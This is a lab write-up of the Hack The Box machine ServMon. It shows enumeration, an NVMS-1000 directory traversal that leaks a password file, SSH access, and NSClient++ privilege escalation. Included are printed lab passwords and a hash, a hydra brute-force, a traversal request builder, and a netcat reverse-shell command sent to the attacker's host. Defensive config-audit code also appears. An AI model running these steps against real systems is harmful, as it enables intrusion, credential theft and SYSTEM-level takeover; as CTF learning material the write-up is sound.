ServMon

Emil Pawlak
Aspiring Pentester | SOC Analyst | Web Developer

Enumeration

nmap

I start with an nmap scan, each command run against the target IP: sudo nmap -sC -sV -Pn -O ; sleep 5; sudo nmap -p- -Pn; sleep 5; sudo nmap -sU -Pn (a default-script and version scan with OS detection, then a full TCP port sweep, then a top-ports UDP scan).

nmap scan results
Nmap scan report for 10.129.227.77
Host is up (0.029s latency).
Not shown: 991 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  07:35PM       <DIR>          Users
22/tcp   open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
|   256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_  256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp   open  http
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  tcpwrapped
8443/tcp open  ssl/https-alt
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.95%I=7%D=4/14%Time=69DE257A%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.95%T=SSL%I=7%D=4/14%Time=69DE2582%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x1
SF:8\x1b\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x
SF:2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.
SF:1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(R
SF:TSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocumen
SF:t\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length
SF::\x2018\r\n\r\nDocument\x20not\x20found");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/14%OT=21%CT=1%CU=35362%PV=Y%DS=2%DC=I%G=Y%TM=69DE25E
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=102%TI=I%CI=I%II=I%SS=S%TS=
OS:U)SEQ(SP=102%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=104%GCD=1%ISR
OS:=10F%TI=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=105%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS
OS:=S%TS=U)SEQ(SP=107%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M4E2NW8
OS:NNS%O2=M4E2NW8NNS%O3=M4E2NW8%O4=M4E2NW8NNS%O5=M4E2NW8NNS%O6=M4E2NNS)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M4E2NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)
OS:U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
OS:FI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-04-14T11:32:53
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.15 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-14 13:33 CEST
Nmap scan report for 10.129.227.77
Host is up (0.029s latency).
Not shown: 65518 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5666/tcp  open  nrpe
6063/tcp  open  x11
6699/tcp  open  napster
8443/tcp  open  https-alt
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 26.55 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-14 13:33 CEST
Nmap scan report for 10.129.227.77
Host is up (0.029s latency).
Not shown: 993 closed udp ports (port-unreach)
PORT     STATE         SERVICE
123/udp  open|filtered ntp
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
500/udp  open|filtered isakmp
4500/udp open|filtered nat-t-ike
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr

OSINT & port 80

Briefly: ServMon is a service that monitors websites and servers and sends alerts depending on how it is set up. NVMS 1000 is a tool from Voltex Security Systems (searchsploit later lists it as TVT NVMS 1000); from what I can see they make surveillance cameras and similar products.

The website looks like a monitoring dashboard for that surveillance tooling. Basic default credentials do not work. I ran ffuf to look for subdomains and other directories.

ffuf -u 'http://10.129.227.77/Pages/FUZZ.htm' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt and ffuf -u 'http://10.129.227.77/' -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -H 'Host: FUZZ.10.129.227.77' -fs 340 should do as a basic first pass (the -fs 340 filters out the 340-byte redirect stub that every unknown Host header gets), though I feel I need to enumerate directories more thoroughly.

I found no other subdomains and some directories:

login                   [Status: 200, Size: 2105, Words: 69, Lines: 60, Duration: 44ms]
main                    [Status: 200, Size: 6126, Words: 1256, Lines: 142, Duration: 73ms]
Login                   [Status: 200, Size: 2105, Words: 69, Lines: 60, Duration: 40ms]
Main                    [Status: 200, Size: 6126, Words: 1256, Lines: 142, Duration: 74ms]
changePassword          [Status: 200, Size: 938, Words: 49, Lines: 43, Duration: 46ms]
MAIN                    [Status: 200, Size: 6126, Words: 1256, Lines: 142, Duration: 48ms]
changepassword          [Status: 200, Size: 938, Words: 49, Lines: 43, Duration: 74ms]
ChangePassword          [Status: 200, Size: 938, Words: 49, Lines: 43, Duration: 79ms]
LogIn                   [Status: 200, Size: 2105, Words: 69, Lines: 60, Duration: 41ms]
%3FRID%3D2671           [Status: 200, Size: 118, Words: 3, Lines: 5, Duration: 38ms]
LOGIN                   [Status: 200, Size: 2105, Words: 69, Lines: 60, Duration: 36ms]
login%3f                [Status: 200, Size: 118, Words: 3, Lines: 5, Duration: 82ms]

When I accessed the site I was automatically redirected to http://10.129.227.77/Pages/login.htm, which both puts everything under "Pages" and uses a ".htm" extension, which isn't something I see often. I can also google around to see which web server behaves like that, as Wappalyzer only finds jQuery.

I will enumerate other possible extensions and look for folders other than "Pages" with ffuf in a second, as there are many other ports and I think I can find some low-hanging fruit before a full enumeration.

Anonymous FTP access is allowed. Inside I found a "Users" folder containing two user directories, Nadine and Nathan.

In Nathan's directory I found a "Confidential.txt" file containing this message from Nadine:

Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

And as for Nadine, there was a to-do file containing:

1) Change the password for NVMS - Complete
2) Upload the passwords
3) Remove public access to NVMS
4) Place the secret files in SharePoint

In this context “NVMS” likely means a network video management system which is a program used to manage CCTV/IP cameras.

NSClient likely refers to NSClient++, a Windows agent used with Nagios for monitoring.

Nagios is a monitoring tool used to track servers, services and network devices. Nagios is very similar to ServMon, so I wonder if I will see both tools or maybe some hybrid. Also, I wonder if there will be some CCTV footage; let's dig and find out.

SMB null sessions are disabled; I tried basic creds for the known users and didn't manage to get in.

On port 8443 there is an NSClient++ dashboard served over HTTPS. When I first accessed it I got a blank page, implying I can't see its content without authenticating. After refreshing a couple of times I got a login screen I hadn't seen before.

I found this info about the web password:

The NSClient++ web password can be shown by running:
nscp web -- password --display

or you can set a new password:
nscp web -- password --set new-password

Looking at the information I gathered, I should probably aim for Nathan's Desktop, but I'm not sure how to get there right now. Maybe over SMB if his desktop is shared, but without brute-forcing and a bit of luck this doesn't seem plausible.

I can't brute-force RIDs over SMB; likely the guest account is disabled.

I ran hydra 10.129.28.144 -s 8443 -S -L users -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10k-most-common.txt http-get "/auth/token?password=^PASS^:F=403 Your not allowed" against the HTTPS port, just so I have something running in the background. (The NSClient++ web API authenticates with a password only, so the -L user list does nothing except multiply the number of attempts.)

The other directories I found aren't much help, but some of them seem unfinished or not working correctly.

I also started brute-forcing extensions with ffuf -u http://10.129.28.144/Pages/loginFUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions-big.txt and looking for directories other than "Pages" with ffuf -u 'http://10.129.28.144/FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fs 118.

Hydra didn’t find any common passwords.

Other root directories:

%3FRID%3D2671           [Status: 200, Size: 340, Words: 32, Lines: 13, Duration: 51ms]

The weird thing about this path is that when I request it, the page constantly refreshes and appends its own subdirectory to the URL on each iteration. Decoded it reads "?RID=2671", which is interesting.

I didn’t find any other extensions.

I just noticed that LLMNR is running on the host and there is no DNS. I will keep Responder running in the background.

I tested basic SSTI and SQL injection payloads on the authentication forms. One thing left to check would be sqlmap, but I don't feel like this is the right way.

Foothold

Searchsploit found some public exploits for nvms-1000

NVMS 1000 - Directory Traversal                                       | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification      | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer Overflow                    | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal                                   | hardware/webapps/48311.py

Yup, I found a nifty exploit on GitHub for the directory traversal. I read how it works, ran it and found some creds!

azaeir@parrot (~/Desktop/htb/machines/servmon/NVMS1000-Exploit): python3 nvms.py 10.129.28.144 /Users/Nathan/Desktop/Passwords.txt
[+] DT Attack Succeeded
[+] File Content

++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++  END  ++++++++++
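As an added example (not the exploit the write-up ran, and not NVMS-1000 code), here is how a traversal request of the kind listed in the searchsploit output is built, and the server-side check that would have stopped it. It assumes the NVMS web server resolves request paths under its web root without collapsing "../", and that twelve "../" hops reach the drive root, which is the shape the public PoCs use; the host, port and sample response used in the checks are constructed.

```python
# Added example, not the exploit the write-up ran: how an NVMS-1000 style traversal
# request is constructed, and what the server-side check should have been.
# Assumptions: the web server serves files relative to its web root without collapsing
# "../", and twelve "../" segments reach the drive root (the shape used by the public
# PoCs). Host, port and the sample response below are constructed for illustration.
import os
import socket

TRAVERSAL_DEPTH = 12  # assumption: enough "../" hops to climb from the web root to C:\


def build_traversal_request(host, target_path, depth=TRAVERSAL_DEPTH):
    """Return a raw HTTP/1.1 GET whose request-target climbs out of the web root.

    requests/urllib normalise "/../" away before the bytes hit the wire, which is why
    traversal PoCs hand-craft the request and push it over a plain socket.
    """
    rel = target_path.lstrip("/\\").replace("\\", "/")
    climb = "../" * depth
    return (
        f"GET /{climb}{rel} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


def split_response(raw):
    """Split a raw HTTP response into (status_code, body); (0, b"") if unparsable."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].split()
    code = int(parts[1]) if len(parts) >= 2 and parts[1].isdigit() else 0
    return code, body


def fetch(host, port, target_path, timeout=5.0):
    """Send the crafted request over a socket and return (status, body).

    This is the only network call; the offline checks exercise the helpers above.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_traversal_request(host, target_path))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return split_response(b"".join(chunks))


def resolve_under_root(web_root, request_target):
    """Defender side: map a request-target onto the web root, or None if it escapes.

    Lexical normalisation (abspath) keeps the check deterministic; a real server should
    additionally use realpath so a symlink inside the web root cannot point outside it.
    """
    root = os.path.abspath(web_root)
    rel = request_target.lstrip("/\\").replace("\\", "/")
    candidate = os.path.abspath(os.path.join(root, rel))
    return candidate if os.path.commonpath([root, candidate]) == root else None


if __name__ == "__main__":
    # Constructed target; swap in the real host and call fetch() to reproduce the request.
    print(build_traversal_request("10.129.28.144", "/Users/Nathan/Desktop/Passwords.txt").decode())
    print(resolve_under_root("/srv/nvms/www", "Pages/login.htm"))
    print(resolve_under_root("/srv/nvms/www", "../" * 12 + "Windows/win.ini"))
```

The reason the PoCs use a bare socket rather than a client library is that libraries normalise /../ out of the URL before sending, so the traversal never reaches the server. resolve_under_root shows the matching defence: normalise first, then verify the result still sits under the web root, rather than trying to blacklist "..".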

I used a users.txt file holding both users (lower- and upper-case variants) and ran it through netexec against the password list. There were two hits for nadine, on SMB and SSH, with L1k3B1gBut7s@W0rk.

Nadine has read access to IPC$ but sadly I can't view any content there. I did manage to run a RID brute-force; here are the results:

SMB         10.129.28.144   445    SERVMON          500: SERVMON\Administrator (SidTypeUser)
SMB         10.129.28.144   445    SERVMON          501: SERVMON\Guest (SidTypeUser)
SMB         10.129.28.144   445    SERVMON          503: SERVMON\DefaultAccount (SidTypeUser)
SMB         10.129.28.144   445    SERVMON          504: SERVMON\WDAGUtilityAccount (SidTypeUser)
SMB         10.129.28.144   445    SERVMON          513: SERVMON\None (SidTypeGroup)
SMB         10.129.28.144   445    SERVMON          1000: SERVMON\Nathan (SidTypeUser)
SMB         10.129.28.144   445    SERVMON          1001: SERVMON\Nadine (SidTypeUser)

There are no interesting custom or unknown users. I hoped there might be a user with RID 2671, but sadly that's not the case.

SSH access worked and I found a user flag on Nadine’s Desktop.

In the root of the filesystem there is a RecData folder holding what look like SQLite database files:

RecordInfoDB.db3
RecordInfoDB.db3-journal

I downloaded them with scp and enumerated them with sqlite3, but they are empty. From the schema and general context it looks like a database that would hold surveillance recordings or their metadata.

Looking further, in Program Files I found folders for both NSClient++ and NVMS1000. I looked through them and noted more interesting files, including some certificates with private keys:

C:\Program Files\NSClient++\security
C:\Program Files\NSClient++\scripts\custom

I noted that down and searched for any simpler priv-esc possibilities.

I decided to run WinPEAS and look what it finds.

+----------¦ Enumerating NTLM Settings
  LanmanCompatibilityLevel    :  (Send NTLMv2 response only - Win7+ default)
  NTLM Signing Settings
      ClientRequireSigning    : False
      ClientNegotiateSigning  : True
      ServerRequireSigning    : False
      ServerNegotiateSigning  : False
      LdapSigning             : Negotiate signing (Negotiate signing)
---
+----------¦ Enumerating Named Pipes 
  Name              CurrentUserPerms                            Sddl
  eventlog          Everyone [Allow: WriteData/CreateFiles]     O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)
  vgauth-service    Everyone [Allow: WriteData/CreateFiles]     O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
---
Folder: C:\Users\Nadine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
    FolderPerms: Nadine [Allow: AllAccess]
    File: C:\Users\Nadine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected) - C:\Users\Nadine\AppData\Roaming\Microsoft\Windows,C:\Users\Nadine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
    FilePerms: Nadine [Allow: AllAccess]
    Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
---
+----------¦ Enumerating Security Packages Credentials
  Version: NetNTLMv2 
  Hash:    Nadine::SERVMON:1122334455667788:847f1545e73196bfcc29b0eccb1a34dc:0101000000000000b7fb082aaacddc01e27df20ae5988a5d000000000800300030000000000000000000000000200000123997709cfe96c3cf5a71ae9cae03f41156e02642aed9e3642bae814b91bb1d0a00100000000000000000000000000000000000090000000000000000000000

This is a summary of the most interesting finds:

  1. Judging by the NTLM settings, there is a possibility of a relay attack
  2. It found some named pipes, but nothing that screams direct priv-esc really
  3. There is a chance for persistence with the rights to the startup folder which is nice
  4. WinPEAS also found an NTLMv2 hash in packages credentials (in memory)

Let's try to crack that NTLMv2 hash: hashcat -m 5600 nadine.hash /usr/share/wordlists/SecLists/Passwords/Common-Credentials/xato-net-10-million-passwords.txt. Sadly, I didn't manage to crack it. (Note that the hash is for Nadine herself, so even a successful crack would only return the password I already have.)

Privilege Escalation

Learning from the foothold, I looked for any public exploits for both NVMS1000 and NSClient++ - seems like I found one for the latter.

I need to verify the version to make sure.

nadine@SERVMON C:\Program Files\NSClient++>.\nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64

Yes, there is an exploit. Here's a summary from the script itself:

# NSClient++ is a monitoring agent that has the option to run external scripts.
# This feature can allow an attacker, given they have credentials, the ability to execute
# arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System by
# Default, this leads to privileged code execution.

I roughly followed the instructions from the GitHub repo; here is what I did.

  1. Got the web administrator password: nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini shows it in plaintext in the config - Web Admin password: ew2x6SsGTxjRwXOT
  2. Downloaded the exploit (EDB-ID 48360) from here
  3. Created a temp folder in the root of the drive with mkdir temp and uploaded nc.exe with scp ~/Desktop/tools/nc.exe nadine@10.129.227.77:C:/temp/
  4. Set up local port forwarding with ssh -L 8443:127.0.0.1:8443 nadine@10.129.227.77
  5. Launched a listener on the attack host with nc -lnvp 1337
  6. Renamed the script from "48360.txt.txt" to "48360.py" with mv
  7. Ran the script with python3 48360.py -t 127.0.0.1 -P 8443 -p "ew2x6SsGTxjRwXOT" -c "C:\temp\nc.exe 10.10.15.189 1337 -e cmd.exe"

With these steps I got a callback on my listener as NT AUTHORITY\SYSTEM and found the root flag on the Administrator's desktop.
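The chain above works because of settings that are all visible in nsclient.ini: the web password is stored in plaintext in a file a low-privilege user can read, CheckExternalScripts is enabled, and the service runs as SYSTEM. As an added example (not from the write-up or the NSClient++ project), the following script audits an nsclient.ini for those settings. The two ini texts and the placeholder password are constructed; the section and key names are real NSClient++ 0.5.x settings; the finding texts are my own.

```python
# Added example, not from the write-up or the NSClient++ project: audit an nsclient.ini
# for the settings that let anyone holding the web password run commands as SYSTEM.
# The ini texts are constructed (the password is a placeholder); the section and key
# names are real NSClient++ 0.5.x settings.
import configparser

VULNERABLE_INI = """
[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = ChangeMe123

[/settings/external scripts]
allow arguments = true
allow nasty characters = true

[/settings/WEB/server]
port = 8443s
"""

HARDENED_INI = """
[/modules]
CheckExternalScripts = disabled
Scheduler = disabled
WEBServer = disabled

[/settings/default]
allowed hosts = 127.0.0.1
"""


def _load(text):
    # NSClient++ uses "/path"-style section names and keys containing spaces; configparser
    # copes with both. interpolation=None so a "%" in a password is not treated as a template.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def _get(cp, section, key):
    return cp.get(section, key, fallback="").strip().lower()


def audit_nsclient_ini(text):
    """Return a list of findings; an empty list means none of the risky settings are present."""
    cp = _load(text)
    findings = []

    if _get(cp, "/settings/default", "password"):
        findings.append(
            "plaintext web password in nsclient.ini: any account that can read the file "
            "can authenticate to the web API")

    if _get(cp, "/modules", "WEBServer") == "enabled":
        hosts = _get(cp, "/settings/default", "allowed hosts")
        if hosts and hosts != "127.0.0.1":
            findings.append(f"allowed hosts = {hosts}: web API reachable from non-loopback addresses")
        # A loopback-only value is not flagged, but it only narrows the source address; a
        # local low-privilege user, or an ssh -L forward, still reaches the API.

    if _get(cp, "/modules", "CheckExternalScripts") == "enabled":
        findings.append(
            "CheckExternalScripts enabled: a web-API user can define a new script and run it "
            "as the service account (NT AUTHORITY\\SYSTEM by default)")
        if _get(cp, "/settings/external scripts", "allow arguments") == "true":
            findings.append("allow arguments = true: callers may pass arbitrary arguments to external scripts")
        if _get(cp, "/settings/external scripts", "allow nasty characters") == "true":
            findings.append("allow nasty characters = true: shell metacharacters are not filtered from arguments")
        if _get(cp, "/modules", "Scheduler") == "enabled":
            findings.append("Scheduler enabled alongside external scripts: a script can be run on a timer without an interactive query")

    return findings


if __name__ == "__main__":
    for name, ini in (("vulnerable", VULNERABLE_INI), ("hardened", HARDENED_INI)):
        found = audit_nsclient_ini(ini)
        print(f"== {name}: {len(found)} finding(s)")
        for f in found:
            print(" -", f)
```

Note that a loopback-only allowed hosts is not a control against a local user: the write-up reached the API through an ssh -L forward to 127.0.0.1. The controls that matter are not enabling CheckExternalScripts (and the Scheduler) when they are not needed, and NTFS ACLs that keep nsclient.ini unreadable to non-administrators; on this box a standard user could type the file straight out of Program Files.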

I also created an issue for the author of this exploit to make the official instruction simpler to follow along.

Closing Thoughts

ServMon is a relatively simple machine. There are two public exploits that can be used to finish it, and a Metasploit module for even less hassle. The level of complexity highly depends on your approach. Overall a good machine to try out.

Regarding lessons learned, I again spent too much time looking for a ton of different possible pivots and didn't focus on the most obvious one. Detailed enumeration is very important, but for time's sake I should follow each vector through to the end before moving on to another.